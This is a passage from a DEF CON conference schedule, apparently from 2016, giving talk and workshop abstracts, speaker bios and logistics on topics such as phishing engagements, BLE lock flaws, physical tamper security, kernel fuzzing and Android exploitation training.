Prerequisites for students: A knowledge of penetration testing is a plus, but I try to make it work for newbies as well.
Materials or Equipment students will need to bring to participate: Each student should come with a laptop capable of running VMs and WiFi. 4 GB of RAM is recommended, as well as 50 GB of disk space.
Return to Index
DEFCON - DEF CON 101 - Saturday - 15:00-15:59
Phishing without Failure and Frustration
Jay Beale CTO InGuardians Inc.
Larry Pesce Director of Research, InGuardians
You want to phish your company or your client. You’ve never done this for work before, you’ve got a week to do it, and you figure that’s plenty of time. Then someone objects to the pretext at the last minute. Or spam filters block everything. Or you decide to send slowly, to avoid detection, but the third recipient alerts the entire company. Or you can only find 5 target addresses. We’ve all been there on our first professional phishing exercise. What should be as easy as building a two page web site and writing a clever e-mail turns into a massively frustrating exercise with a centi-scaled corpus of captured credentials. In this talk, we’ll tell you how to win at phishing, from start to finish, particularly in hacking Layer 8, the "Politics" layer of the OSI stack that’s part of any professional phishing engagement. We’ll share stories of many of our experiences, which recently included an investigation opened with the US Securities and Exchange Commission (SEC). Finally, we’ll tell you how we stopped feeling frustrated, learned to handle the politics, and produced successful phishing campaigns that hardened organizations at the human layer, and started to screw things up for the bad actors.
Jay Beale has created several security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which have been used throughout industry and government. He has served as an invited speaker, program chair and trainer at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the ‘Stealing the Network’ series. Jay is a founder and the CTO of the information security consulting company InGuardians, where way too many clients’ staff have enthusiastically given him their passwords.
Twitter: @jaybeale
Jay Beale on Facebook
Larry Pesce, the Director of Research at InGuardians, has a long history with hacking that began with the family TV when he was a kid, rebuilding it after it caught on fire. Both times. Later, as a web developer for a university in the early days of the Internet, he managed some of the first layer 3-switched networks in the world. Larry holds a handful of SANS certs, wrote a book or two and co-founded the multiple international award-winning security podcast, "Paul's Security Weekly". When not pursuing these activities, work-related passions have also involved leveraging OSINT for attack surface development.
Outside of work, Larry enjoys long walks on the beach weighed down by his ham radio (DE KB1TNF) and thinking of ways to survive the pending zombie apocalypse.
Return to Index
Workshops - Las Vegas Ballroom 7 - Saturday - 14:00-18:00
Physical Security for Computing Systems, a Look at Design, Attacks and Defenses
Steve Weingart Security Researcher
Physical security for computing systems is a topic that usually gets left to FIPS 140 and tamper labels, but it is a much broader and more interesting subject. As the value of data on computing systems increases and operating systems become more secure, physical attacks on computing systems to steal or modify assets become more likely. At the low end are locks and tamper labels, at the high end are complex mechanisms to detect and respond to tampering and intrusion from the box level all the way down to the chip level. All of this technology requires constant review and improvement, just as other competitive technologies need review to stay at the leading edge. The bar is ever rising.
Physical security is an interdisciplinary field. The materials and chemistry are as important as the electronics, circuits and physics. A tamper label can be defeated by application of the right solvent. A cover switch can be defeated by piping super glue in through an air vent or a slightly bent cover. Hard epoxies can be removed with drain cleaner and a tamper detection circuit can be defeated by setting the supply voltage to a critical value or a microprocessor's start up tests bypassed by manipulating the width of the reset pulse.
This training session will show many of the known attack and defense methods from the basic to the exotic. It will include easy and low tech ways of performing high tech attacks, as well as descriptions of the highest tech methods.
Design examples will be shown with examples of the tools, devices, circuits and materials used to implement both attack and defense systems. Demonstrations will be included.
Steve Weingart has been active in the Security Standards and Physical Security communities since the 1980s. He was on the NIST panel that wrote FIPS 140-1 and has been a continuing contributor to both FIPS 140 and Common Criteria development. At the IBM Thomas J. Watson Research Center, he was the lead engineer for the IBM 4758 secure coprocessor, which was the first cryptographic module validated at Security Level 4 under FIPS 140-1. He has continued to work in the security field as a developer of secure cryptographic modules, a consultant, a standards test lab engineer and as a standards test lab manager. Steve now coordinates security standard certifications for Aruba and continues to consult, contribute to the standards community and train others in security standards and physical security.
Max Class Size: 55
Prerequisites for students: Some knowledge of analog and digital electronic circuits would be very helpful. Knowledge of materials and some chemistry is handy too.
Materials or Equipment students will need to bring to participate: None, I will supply any needed.
Return to Index
DEFCON - Track Three - Saturday - 11:00-11:59
Picking Bluetooth Low Energy Locks from a Quarter Mile Away
Anthony Rose Hacker
Ben Ramsey Hacker
Many Bluetooth Low Energy (BLE) enabled deadbolts and padlocks have hit the market recently. These devices promise convenience and security through smartphone control. We investigated sixteen of these products from multiple vendors and discovered wireless vulnerabilities in most of them. Using a $50 antenna, we successfully picked vulnerable locks from over 400 meters away. In this presentation we introduce open source tools to crack each of the vulnerable BLE locks. Furthermore, after surveying the open source Bluetooth hacking tools currently available, we find very little support for BLE. So, to make discovering and range finding to BLE devices easier, we introduce a new open source war-walking tool compatible with both Bluetooth Classic and BLE.
Anthony Rose is an electrical engineer with five years of network security experience. His prior work includes traffic and quality optimization for wireless video protocols. Currently he focuses on Bluetooth security and wireless penetration testing.
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, and Bluetooth Low Energy. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Return to Index
IOT - Bronze 4 - Friday - 14:00-14:50
Picking Bluetooth Low Energy Locks from a Quarter Mile Away
Anthony Rose
Many Bluetooth Low Energy (BLE) enabled deadbolts and padlocks have hit the market recently. These devices promise convenience and security through smartphone control. We investigated sixteen of these products from multiple vendors and discovered wireless vulnerabilities in most of them. Using a $50 antenna, we successfully picked vulnerable locks from over 400 meters away. In this presentation we introduce open source tools to crack each of the vulnerable BLE locks. Furthermore, after surveying the open source Bluetooth hacking tools currently available, we find very little support for BLE. So, to make discovering and range finding to BLE devices easier, we introduce a new open source warwalking tool compatible with both Bluetooth Classic and BLE.
These locks are being relied upon by consumers to protect their homes and property and they need to be fully aware of the risks. By revealing the security vulnerabilities in BTLE locks from multiple vendors and by releasing open source tools to crack them wirelessly, we hope to put pressure on companies to improve security in future products. Plus, we will perform live demos of two of our tools.
Anthony Rose is an electrical engineer with five years of network security experience. His prior work includes traffic and quality optimization for wireless video protocols. Currently he focuses on Bluetooth security and wireless penetration testing.
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, and Bluetooth Low Energy. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Return to Index
DEFCON - Track Two - Saturday - 12:30-12:59
pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle
Brad Dixon, Hacker
Security assessments of embedded and IoT devices often begin with testing how an attacker could recover firmware from the device. When developers have done their job well you'll find JTAG locked-up, non-responsive serial ports, locked-down uboot, and perhaps even a home brewed secure-boot solution. In this session you'll learn details of a useful hardware/software penetration technique to attempt when you've run out of easier options. We've used this technique on two commercial device security assessments successfully and have refined the technique on a series of test devices in the lab. This session will cover the prerequisites for successful application of the technique and give you helpful hints to help your hack! Best of all this technique, while a bit risky to the hardware, is easy to try and doesn't require specialized equipment or hardware modification. We are going to take pieces of metal and stab them at the heart of the hardware and see what happens. For the hardware/firmware developer you'll get a checklist that you can use to reduce your vulnerability to this sort of attack.
Brad Dixon once told his parents that if they gave him a Commodore 64 it would be the last computer he'd ever want. He never got that Commodore 64. Nevertheless Brad managed to become a computer nerd at a young age. Brad studied Computer Engineering at Georgia Tech and jumped into embedded software engineering. He worked for many years helping developers to design embedded Linux into telecom, network, and mobile products. Brad also took a turn as a product manager for embedded development tools and a mobile location analytics product. At Carve Systems he hacks IoT, embedded, and Linux systems.
Return to Index
Demolabs - Table 3 - Saturday - 14:00-15:50
PKI for the People
Ze'ev Glozman
We are creating a public system that will monitor the public SSL infrastructure from user mobile or desktop endpoints and alert users to any intervention by a third party, be it state or non-state actor. We will be able to detect and categorize those changes as legitimate or illegitimate. This is an open source tool using a peer-to-peer network based on a mobile and desktop app. The tool will be available both as source code and as the actual application. This node net is used to audit and monitor changes in real-time to the global security infrastructure. This includes DNS records, IP addresses, domain names, certificate IDs, and public roots. The final product is an application able to tell a user, "Are you being mitm-ed right now?"
Ze'ev Glozman started working with computers at a very young age in the Soviet Union. He was introduced to System V Unix at age 14. He used to work in healthcare technology, and his current focus is the public trust and public key infrastructure.
Return to Index
DEFCON - Track Three - Sunday - 15:00-15:59
Platform agnostic kernel fuzzing
James Loureiro Researcher, MWR InfoSecurity
Georgi Geshev Security Researcher, MWR InfoSecurity
A number of toolsets have been around for a while which propose methods for identifying vulnerabilities in kernels, in particular POSIX kernels. However, none of these offers a method for generic fuzzing across Windows and POSIX kernels, and they have not been updated for some time.
This presentation will outline the research which has occurred in order to find exploitable bugs across both Windows and POSIX kernels, focusing on fuzzing system calls and library calls in the Windows environment. System calls will be briefly explained, how they work and how these can be fuzzed in order to find bugs. The presentation will then move on to explaining core libraries in the Windows environment and how to fuzz these effectively.
Other issues with creating a kernel fuzzing environment will be discussed, such as effective logging of calls in which the machine could BSOD and kernel panic, and how to correctly reproduce vulnerabilities that have been identified by the fuzzer. We will also cover efficient scaling of a kernel fuzzer so that a number of virtual machines are in operation that can generate a large number of crashes.
Finally, a brief summary of the vulnerabilities that have been identified will be provided.
James Loureiro is a researcher at MWR InfoSecurity. During his time there he has conducted research into a number of technologies, particularly ICS. Further, James has conducted research into Adobe Reader and other widely deployed platforms, which has identified vulnerabilities. These can be found on the MWR Labs website - labs.mwrinfosecurity.com. James has also presented previously at BSides London on this topic.
Georgi Geshev is a security researcher for MWR InfoSecurity in the UK. Born in the Eastern Bloc, a true wannabe Aussie now, he appreciates roo steaks and golden ales. His main areas of interest include bug hunting, reverse engineering and network protocols. It is a well known fact that Georgi only knows about MQ technology.
Twitter: @NerdKernel, @munmap, @mwrlabs
Return to Index
DEFCON - Track Two - Saturday - 15:00-15:59
Playing Through the Pain? - The Impact of Secrets and Dark Knowledge on Security and Intelligence Professionals
Richard Thieme ThiemeWorks
Dismissing or laughing off concerns about what it does to a person to know critical secrets does not lessen the impact when those secrets build a different map of reality than "normals" use and one has to calibrate narratives to what another believes. The cognitive dissonance that inevitably causes is managed by some with denial who live as if refusing to feel the pain makes it disappear. But as Philip K. Dick said, reality is that which, when you no longer believe in it, refuses to go away. And when cognitive dissonance evolves into symptoms of traumatic stress, one ignores those symptoms at one's peril. But the constraints of one's work often make it impossible to speak aloud about those symptoms, because that might threaten one's clearances, work, and career. The real cost of security work and professional intelligence goes beyond dollars. It is measured in family life, relationships, and mental and physical well-being.
The divorce rate is as high among intelligence professionals as it is among medical professionals, for good reason - how can relationships be based on openness and trust when one's primary commitments make truth-telling and disclosure impossible?
Richard Thieme has been around that space for years. He has listened to people in pain because of the compelling necessities of their work, the consequences of their actions, the misfiring of imperfect plans, and the burdens of - for example - listening to terrorists slit someone's throat in real time, then having to act as if they had a normal day at the office. Thieme touched on some of this impact in his story, "Northward into the Night," published in the Ranfurly Review, Big City Lit, Wanderings and Bewildering Stories before collection in "Mind Games." The story illuminates the emotional toll of managing multiple personas and ultimately forgetting who you are in the first place.
The bottom line is, trauma and secondary trauma have identifiable symptoms and they are everywhere in the "industry." The "hyper-real" space which the national security state creates by its very nature extends to normals, too, now, but it's more intense for professionals. Living as "social engineers," always trying to understand the other's POV so one can manipulate and exploit it, erodes the core self. The challenge is not abstract or philosophical, it's existential, fired into our faces every day at point blank range, and it constitutes an assault on authenticity and integrity. Sometimes sanity is at stake, too, and sometimes, life itself. In one week, two different people linked to the CIA told Thieme that going into that agency was like becoming a scientologist. Think about what that analogy means. For his own sake and sanity, Thieme has thought about it a lot and that's what this talk is about - the real facts of the matter and strategies for effective life-serving responses.
Richard Thieme is an author and professional speaker focused on the challenges posed by new technologies and the future, how to redesign ourselves to meet these challenges, and creativity in response to radical change. His column, ‘Islands in the Clickstream,’ was distributed to subscribers in sixty countries before collection as a book in 2004. When a friend at the National Security Agency said after they worked together on ethics and intelligence issues, ‘The only way you can tell the truth is through fiction,’ he returned to writing short stories, 19 of which are collected in "Mind Games."
His latest work is the stunning novel "FOAM," published by Exurban Press September 2015. He is also co-author of the critically extolled "UFOs and Government: A Historical Inquiry," a 5-year research project using material exclusively from government documents and other primary sources, now in 65 university libraries. His work has been taught at universities in Europe, Australia, Canada, and the United States, and he has guest lectured at numerous universities, including Purdue University (CERIAS), the Technology, Literacy and Culture Distinguished Speakers Series of the University of Texas, the "Design Matters" lecture series at the University of Calgary, and as a Distinguished Lecturer in Telecommunications Systems at Murray State University.
He addressed the reinvention of "Europe" as a "cognitive artifact" for curators and artists at Museum Sztuki in Lodz, Poland, keynoted CONFidence in Krakow 2015, and keynoted "The Real Truth: A World’s Fair" at Raven Row Gallery, London. He recently keynoted Code Blue in Tokyo. He loved Tokyo. He has spoken for the National Security Agency, the FBI, the Secret Service, the US Department of the Treasury, and Los Alamos National Labs and has keynoted "hacker," security, and technology conferences around the world. He keynoted the first two Black Hats and he is speaking at DEF CON for the 21st year.
Twitter: @neuralcowboy
Return to Index
Workshops - Las Vegas Ballroom 1 - Friday - 14:00-18:00
Practical Android Application Exploitation
Dinesh Shetty Lead of Mobile Security, Testing Center of Excellence at Security Innovation
Aditya Gupta Founder and Principal Consultant, Attify
Ever wonder how different attacking a mobile application is from attacking a traditional web application? Gone are the days when knowledge of just SQL Injection or XSS could help you land a lucrative, high-paying infosec job.
This will be a detailed course with extensive hands-on exploitation of Android applications. The training will be based on exploiting Android-InsecureBankv2 and other vulnerable applications written by the trainer in order to give in-depth knowledge of the different kinds of vulnerabilities in Android applications. This course will also discuss how an attacker can compromise a mobile application. After the workshop, students will be able to successfully pentest and secure applications running on the various operating systems.
The training will also include a CTF challenge at the end, where attendees will use the skills learnt in the training to solve the CTF challenges.
Dinesh leads the Mobile Security Testing Center of Excellence at Security Innovation. He has performed innumerable penetration tests on Web, Mobile and VoIP technologies - however his core area of expertise is Mobile and Embedded application pentesting and exploitation. He is an accomplished author and speaker, and his research has been published in multiple security zines and sites like Packet Storm, Exploit-DB, PenTest Magazine, SecurityXploded, ClubHACK Magazine, and Exploit-Id amongst others. Dinesh is a Hall of Fame member of Apple, Adobe, and Barracuda Networks for his identification and responsible disclosure of critical security vulnerabilities in their products, web sites, and web services.
Aditya Gupta (@adi1391) is the founder and principal consultant of Attify (attify.com), an IoT and mobile security firm, and a leading mobile security expert and evangelist. He has done a lot of in-depth research on mobile application security and IoT device exploitation. He is also the author of the popular Android security book "Learning Pentesting for Android Devices", which has sold over 10,000 copies since its launch in March 2014. He is also a frequent speaker and trainer at numerous international security conferences including Black Hat, Syscan, OWASP AppSec, PhDays, Brucon, Toorcon, Clubhack etc., and also provides private training for developers and red teams at organisations all over the world.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate:
- Laptop with Genymotion installed.
- 20+ GB free hard disk space
- 3+ GB RAM
- Android Studio installed on the machine.
Return to Index
SkyTalks - Skyview 3 - Saturday - 14:00-14:59
Speaker: James Edge
Talk: Practical Penetration Testing of Embedded Devices
This talk will go into the methodology of breaking into an embedded device during a penetration test or red team engagement. This talk is about real-world testing where you don't have physical access to a device and it is a fixed-length engagement where the client expects a deliverable.
The vulnerabilities, issues, and methods discussed were found and conducted during penetration tests and not researched in a lab.
Return to Index
CPV - Bronze 2 - Friday - 12:00-13:00
Talk Title:
Practical Text-Based Steganography: Exfiltrating Data from Secure Networks and Socially Engineering SecOps Analysts [WORKSHOP]
Speaker Name, Employer or position:
Joe Gervais (TryCatchHCF) - Principal InfoSec Engineer / Lead Pentester at Lifelock
Abstract:
This workshop introduces real-world uses of text-based steganography to cloak your communications from the omnipresent web of machines and their human collaborators. Attendees will learn techniques to simply and repeatably bypass DLP controls and defeat data whitelisting enforced by Multi Level Security (MLS) devices. You will also learn methods for generating social engineering attacks against SecOps analysts and censors who may review your communications, plus techniques to counter frequency analysis attacks against your cloaked communications. All of this is accomplished using only simple Python scripts and text-based ciphers of your choosing. Attendees will then use the toolset to generate their own custom ciphers and social engineering attacks as we work through scenarios together.
Bio:
TryCatchHCF / Joe Gervais is the Principal InfoSec Engineer & Lead Pentester at LifeLock, and author of the Cloakify exfiltration toolset. He has 25+ years of security- and software-engineering experience, mostly in US gov't/DoD sectors, and served as an Intelligence Analyst and Counterintelligence Specialist in the United States Marine Corps. Education includes a bachelor's degree in Cognitive Science and a master's degree in Information Assurance.
Social media links if provided:
https://github.com/TryCatchHCF
Return to Index
Workshops - Las Vegas Ballroom 6 - Friday - 14:00-18:00
Pragmatic Cloud Security: Hands-On Turbocharged Edition
Rich Mogull (Crash) Analyst & CEO, Securosis
This workshop takes the very best of our Black Hat cloud security defensive training classes and crams them into a high-speed, 4-hour DEF CON session. If you work in cloud, or are just cloud-curious, we’ll get you up to speed on the latest and greatest practical techniques for securing Amazon Web Services. We are cutting out all the theory to focus exclusively on the technical implementation.
Before coming to the session you should know what AWS is and be able to launch and connect to an instance (we’ll provide instructions ahead of time just to be safe). You should also be comfortable with a Linux command line and basic scripting. That’s all you need walking in, but by the time you leave we will have shown you:
- How to build complex AWS virtual networks with cross-account and VPC connectivity.
- How to leverage auto scale groups for building immutable infrastructure. What’s that? Servers that are impossible to log into and replaced every few hours with 0 downtime.
- Techniques for advanced IAM policies in AWS. For example, using tags or other conditionals for dynamic, fine-grained access.
- Building serverless infrastructure for automating security. You can, and we sh*t you not, create actual self-healing infrastructure in AWS without any running servers.
- Automation techniques to play with the AWS APIs like a boss. Sure, we’ll focus on the defensive side, but let’s just say you offensive types might pick up a thing or two.
- How to build an automated deployment pipeline using Git, Jenkins, Packer, and Ansible to push new images to AWS. (We’ll use a scripted build for time, but you’ll see how it all pieces together).
- If we have time, we’ll show you how to use Amazon’s Key Management Service to encrypt… everything. Plus cover how to make things subpoena proof, if you are into that sort of thing.
The focus of the workshop is on defense, and how to best use the tools in AWS for security. We can’t cover everything in four hours, so we will focus on the technical techniques you can use to build up your skills most quickly.
Rich has twenty years' experience in information security, physical security, and risk management. He specializes in cloud security, data security, application security, emerging security technologies, and security management. He is also the principal course designer of the Cloud Security Alliance training class and actively works on developing hands-on cloud security techniques. Prior to founding Securosis, Rich was a Research Vice President at Gartner on the security team. Prior to his seven years at Gartner, Rich worked as an independent consultant, web application developer, software development manager at the University of Colorado, and systems and network administrator.
Rich is the Security Editor of TidBITS and a frequent contributor to publications ranging from Information Security Magazine to Macworld. He is a frequent industry speaker at events including the RSA Security Conference, Black Hat, and DEF CON, and has spoken on every continent except Antarctica (where he's happy to speak for free -- assuming travel is covered).
Max Class Size: 55
Prerequisites for students: Comfortable with some flavor of Linux and command lines. Ideally basic scripting skills in bash, python and/or ruby.
Materials or Equipment students will need to bring to participate: Laptop or tablet that can connect to Amazon Web Services. An AWS account (labs will be mostly on the free tier, so total costs will be less than a beer). Ability to make SSH connections to arbitrary AWS instances. Instructions for setting up your account will be made available before the workshop.
Return to Index
WOS - Skyview 6 - Friday - 11:10-11:59
Presenting Security Metrics to the Board / Leadership
Walt Williams
The board of directors and corporate leadership are not interested in how many attacks your firewall has blocked, and frankly, that is not a metric, that is a measure. The difference between metrics and measurements, how metrics are constructed, and the kinds of metrics the board of directors are interested in will be discussed. In other words, how to align security metrics with business goals and objectives. The use of frameworks such as ISO 27004 to construct metrics, and the pragmatic framework and its uses, will also be discussed.
Walt Williams (Twitter: @LESecurity) CISSP, SSCP, CPT has served as an infrastructure and security architect at firms as diverse as GTE Internetworking, State Street Corp, Teradyne, The Commerce Group, and EMC. He has since moved to security management, where he now manages security at Lattice Engines. He is an outspoken proponent of design before build, an advocate of frameworks and standards, and has spoken at Security B-Sides on risk management as the cornerstone of a security architecture. He maintains a blog on security metrics and has presented to boards of three different organizations in diverse industries.
Return to Index
CPV - Bronze 2 - Friday - 17:30-18:00
Talk Title:
privacy by design - it's n0t that difficult
Speaker Name, Employer or position:
Petri Koivisto
Abstract:
Privacy by design is (still) a hot topic at the moment. Why? Data privacy has become one of customers' basic assumptions, and they know to demand evidence of how you are doing it. Privacy by design is not that difficult, if you have a bit of common sense and creativity. This presentation will give you a new way of thinking about how to build privacy into whatever design you may have, through a simple house example, layered-approach thinking, humour and audience participation.
Bio:
Petri Koivisto is a different kind of privacy/security enabler aiming to be something with a fancy title like DPO/CISO. My mission is to make you look awesome in privacy/infosec.
Social media links if provided:
@petriokoivisto
Return to Index
DEFCON - Track Two - Friday - 11:00-11:59
Project CITL
Mudge Zatko Director, CITL
Sarah Zatko CHief Scientist, CITL
Many industries provide consumers with data about the quality, content, and cost of ownership of products, but the software industry leaves consumers with very little data to act upon. In fact, when it comes to how secure or weak a product is from a security perspective, there is no meaningful consumer-facing data. There has long been a call for the establishment of an independent organization to address this need. Last year, Mudge (of DARPA, Google, and L0pht fame) announced that after receiving a phone call from the White House he was leaving his senior position inside Google to create a non-profit organization to address this issue. This effort, known as CITL, is akin to Consumer Reports in its methodologies. While the media has dubbed it a "CyberUL", there is no focus on certifications or seals of approval, and no opaque evaluation metrics. Rather, like Consumer Reports, the goal is to evaluate software according to metrics and measurements that allow quantitative comparison and evaluation by anyone from a layperson or CFO to a security expert.
How? A wide range of heuristics that attackers use to identify which targets are hard or soft against new exploitation has been codified, refined, and enhanced. Some of these techniques are quite straightforward and even broadly known, while others are esoteric tradecraft. To date, no one has applied all of these metrics uniformly across an entire software ecosystem and shared the results.
For the first time, a peek at the Cyber Independent Testing Lab’s metrics, methodologies, and preliminary results from assessing the software quality and inherent vulnerability in over 100,000 binary applications on Windows, Linux, and OS X will be revealed. All accomplished with binaries only. Sometimes the more secure product is actually the cheaper, and quite often the security product is the most vulnerable.
There are plenty of surprises like these that are finally revealed through quantified measurements. With this information, organizations and consumers can finally make informed purchasing decisions when it comes to the security of their products, and measurably realize more hardened environments. Insurance groups are already engaging CITL, as are organizations focused on consumer safety. Vendors will see how much better or worse their products are in comparison to their competitors. Even exploit developers have demonstrated that these results enable bug-bounty arbitrage. That recommendation you made to your family members last holiday about which web browser they should use to stay safe (or that large purchase you made for your industrial control systems)? Well, you can finally see if you chose a hard or soft target… with the data to back it up.
Mudge Zatko is the Director of CITL. He has contributed significantly to disclosure and education on information and security vulnerabilities. In addition to pioneering buffer overflow work, the security work he has released contained early examples of flaws in the following areas: code injection, race conditions, side-channel attacks, exploitation of embedded systems, and cryptanalysis of commercial systems. He was the original author of the password cracking software L0phtCrack, Anti-Sniff, and L0phtWatch. In 2010 Mudge accepted a position as a program manager at DARPA where he oversaw cyber security R&D, and rebuilt the Agency’s approach to cyber security research. In 2013 Mudge went to work for Google where he was the Deputy Director of their Advanced Technology & Projects division. Most recently, after conversations with the White House, Mudge stood up the non-profit Cyber Independent Testing Laboratory inspired by efforts such as Consumers Union. He is the recipient of the Secretary of Defense Exceptional Civilian Service Award medal, an honorary Plank Owner of the US Navy Destroyer DDG-85, was inducted into the Order of Thor, the US Army’s Association of Cyber Military Professionals, recognized as a vital contributor to the creation of the US Cyber Corps (SfS PDD-63), and has received other commendations from the CIA and from the Executive Office of the President of the United States.
Sarah Zatko is the Chief Scientist at CITL, a partner at L0pht Holdings, LLC, and a member of the US Army’s Order of Thor. She has presented her research on the integration of security into CS curriculum at Shmoocon and Hope. That work is also published in IEEE Security & Privacy. She holds a degree in mathematics from MIT and a Master's in computer science from Boston University.
Return to Index
DEFCON - DEF CON 101 - Saturday - 17:30-17:59
Propaganda and You (and your devices) - How media devices can be used to coerce, and how the same devices can be used to fight back.
The Bob Ross Fan Club Security Software Engineer
Any novice in the security field can tell you the importance of sanitizing input that is being read into computer systems. But what steps do most of us take in sanitizing the input that is read into the computer systems known as our brains? This presentation will go over the attack vector that is known as Propaganda. By studying works such as Manufacturing Consent (by Noam Chomsky and Ed Herman) we can learn of the various manipulations that happen to media before it reaches the end reader.
Armed with the knowledge of how propaganda works, a person could attempt a more healthy diet of media consumption. Computer and data networks are heavily utilized by those wishing to push agendas, but who is to say these same technologies can not be utilized to fight back? Developers have access to all sorts of tools that help accomplish this feat, such as web scrapers, natural language tool kits, or even the reddit source code repository. This talk will walk the audience through some different techniques that can be used for better media consumption.
The Bob Ross Fan Club is currently working as a security software engineer for embedded Linux systems. He has previously been a part of published research efforts on the topics of user privacy and the threats posed by the tracking practices employed by internet companies.
Twitter: @bobross_fc
Return to Index
BHV - Skyview 4 - Friday - 11:00-11:59
Speaker: Amanda Plimpton/Evan Anderson
Amanda Plimpton/Evan Anderson:
Collaborators Amanda Plimpton and Evan Anderson are active in the body augmenting community and excited to see the current growth in citizen science. Small groups and individuals who choose to pursue lines of inquiry and conduct ethical, methodical experiments are the key to the next series of breakthroughs that we will see across many sectors. Citizen scientists are people driven to investigate, experiment and seek answers. Whether they channel their passionate interests into a start-up business or stay in the nonprofit sector, they will continue to make important contributions in their fields. Our goal as speakers here is more modest: we are bringing forward research as a starting point for ourselves and our audience. Human experimentation has a long (and dark) history and today is fraught with ethical dilemmas and tensions. By looking at it through the lens of military experiments with a focus on psychoactive drugs we hope to add a small amount of research to the open source science body of work and to highlight the need for sound, ethically sourced data. Hopefully we will provoke thoughtful discussions around modern human experiments.
Abstract:
By looking at key experiments and trials done by the military we can learn about psychoactive chemicals and protocols that work, and don’t work, on humans. From biological enhancement to chemical deterrents, there is a wealth of information that grassroots scientists and body augmenters can use for their research and experiments.
Return to Index
Ballys - Blu Pool - Friday - 20:00-03:00
Open to all LGBT and our friends. Queercon Pool Party
@Blu Pool, Bally's 20:00-03:00
The annual tradition continues! Queercon takes over the Blu Pool at Bally's Friday Night for our most epic pool party yet. There is no better party to be at. Queercon's legacy began at the pool so we go back to our roots to celebrate diversity in one of the best DEFCON parties. We welcome anyone from the LGBT, as well as our friends and allies. This party is no drama and no attitude. Just come as you are.
The pool will be open, the music will be playing and the bar will be serving. Don't forget your swimwear. Come party for our epic Pool Party that you won't forget.
DJ Lineup to be announced.
Thank you to our Official Pool Party Sponsor:
HackerOne
ABSOLUTELY NO OUTSIDE DRINKS ALLOWED!
Saturday, August 6th
Return to Index
Workshops - Las Vegas Ballroom 4 - Thursday - 10:00-14:00
Raspberry Pi and Kali Deluxe Spy workshop
Dallas Security Researcher
Sean Satterlee (ohm)
EventBrite Link: Required for Tickets and/or buying kits:
https://www.eventbrite.com/e/defcon-workshops-2016-hacking-with-raspberry-pi-and-kali-tickets-26124104901
Back by popular demand. This year will be a tight 4 hour run through of lots of great information. There will be 2 classes (both the same) of 4 hours each – so pick the best one for you. This class is appropriate for ages 15 and above who want to learn more about Raspberry Pi hardware and the Kali security framework. Kali is a combination of operating system and hacker security tools used for security testing (spying as well). If you choose the kit, you will leave with an excellent starting point for hardware, robotics, spying, and security fun. Space is limited, so sign up quickly.
Cutoff is July 15-ish for kits. We will also be inviting guest speakers / hardware village / vendors (if available) who are key to the Raspberry Pi / Maker movement and Kali / Metasploit frameworks to drop by and say hello during class. You never know what new release or feature might show up. A laptop is required. See the sign-up information below for more details on the pre-installed tools needed. We will also email this out to registered guests as well.
In four hours we will cover the Raspberry Pi including:
- History / hardware in kit
- Installing the OS
- Python Programming (Intro, Hello World, Hardware Interfacing options)
- Controlling LEDs (Light up LED, Loops, timer)
- Controlling Multi Color LED Strips (1000s of colors) – Different type of LED
- Distance and Motion Sensors (detecting motion / Distance) – Interface a sensor
- Sensors (Advanced)
- Controlling Relays (Controlling real world objects, motors, lights)
- Interfacing to the outside world
- Updating components of the OS
- Introduction to Kali (Pen testing platform)
- Updating Kali OS / Components
- Kali command set tools on the Rpi
- Using tools to spy on your target
- Modules to install on Kali (discussion of Metasploit)
- Networking (Discovery / Setup)
- Wireless Networking
- Social Media Spying
- Sniffing Wi-fi and setting up multiple adapters
- Penetration testing overview and discussion
- Uses for Physical Security
- Discussion of the Role of Rpi and Kali / Security
- Discussion and kits provided for Kali also on your PC (Distro)
- Optional (camera and vision)
We will have options for people who want to bring their own or just buy a kit. Keep in mind, if you bring your own and don't bring everything - it may not work. We won't have time to work around your specific configuration. This workshop is free, however you need a ticket and a DEF CON badge to attend. The kits are not free. If something goes wrong and the conference is cancelled, then you will get the kit and documentation. If something bad happens during the workshop (lose power, kicked out, no wifi, whatever) - sorry, it's free (the workshop), but you will still have the kit if you bought that type of kit.
KIT OVERVIEW: (Not Complete listing)
- Raspberry Pi 3
- Case
- Power Supply(2.5amp)
- Display Screen (working on largest 5-7") - HDMI or Ribbon Based
- Potential Display Powersupply and Cable (pending)
- Relays
- Sensors (Distance and Motion)
- Bread Board
- Jumper Wires (Matched to work with sensors and such)
- MicroSD Card (OS)
- MicroSD Card (Kali)
- Additional Wi-fi Adapter (beyond the one included)
- Keyboard w/ Touchpad
- Power Strip (At least 3 outlet)
- LEDs (Usual 2 wire type)
- Resistors
- Motor
- Buttons
- LED Strip
- Arduino (Yep you get one of these as well)
- Camera (Optional - see ticket add-on)
NOTE: We price the kit based on electronics resellers such as MTM, Amazon, AdaFruit and trusted shipping companies in the US for bulk pricing. We are working on getting as large an LCD screen and other features as possible. If we get a good discount, you can expect more in your kit (surprise) and maybe some cash to roll at the tables. We won't know quantity until late June, then expected ship times run until very late June (i.e. right before DEF CON). If we need to priority ship something, that costs more money. We price the kits to be standard, cost effective, and do not try to make money. Our main goal is to make them as standard as possible for the class to go smoothly in the time allowed, and ensure everything works together. Nothing's worse than getting everything in the kit except, say, the keyboard or the display, so we have to hedge our bets. Based on previous workshops, people wanted to pay more for a larger screen vs a small 4-inch screen. People wanted to have options (such as camera or cool LED strip) included vs parting it out. [i.e. a new person didn’t know what the camera or other items are used for]. When we get the exact parts list (models and pn) we will list it here for someone bringing their own. Previous workshops have shown bring-your-own did not generally work out very well (takes more time to get yours to work vs ours) - with a few exceptions.
YOU NEED TO BRING:
LAPTOP (Recommend Windows 7 or Higher) with Wifi and Network ports
SNACKS
Suggest an extra power cord and outlet strip (not required, but we never know what the hotel will provide); we do a good job planning around this, but just in case.
OTHER Information:
